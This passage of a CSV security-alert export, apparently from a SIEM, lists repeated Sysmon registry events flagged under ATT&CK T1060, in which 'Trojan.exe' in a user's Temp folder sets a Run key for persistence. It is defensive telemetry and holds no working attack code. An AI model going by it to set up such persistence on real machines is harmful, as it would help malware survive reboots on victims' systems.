..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:15.847683600Z"",""eventRecordID"":""1893"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:15.840\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:15.840"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:18.205",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:14.824 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:14.830985800Z"",""eventRecordID"":""1891"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:14.824\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:14.824"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:17.189",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:13.808 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:13.810865100Z"",""eventRecordID"":""1890"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:13.808\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:13.808"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:16.240",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:12.793 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:12.794774700Z"",""eventRecordID"":""1889"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:12.793\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:12.793"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:15.158",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:11.762 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:11.764048600Z"",""eventRecordID"":""1888"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:11.762\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:11.762"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:14.189",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:10.731 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:10.734517100Z"",""eventRecordID"":""1887"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:10.731\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:10.731"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:14.173",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:09.715 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:09.717115100Z"",""eventRecordID"":""1886"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:09.715\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:09.715"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:14.096",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:08.683 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:08.685402300Z"",""eventRecordID"":""1885"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:08.683\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:08.683"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:11.052",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:07.652 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:07.653852200Z"",""eventRecordID"":""1884"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:07.652\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:07.652"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:10.017",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:06.621 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:06.622251900Z"",""eventRecordID"":""1883"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:06.621\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:06.621"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:09.002",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:05.606 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:05.610310400Z"",""eventRecordID"":""1882"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:05.606\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:05.606"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:08.001",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:04.590 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 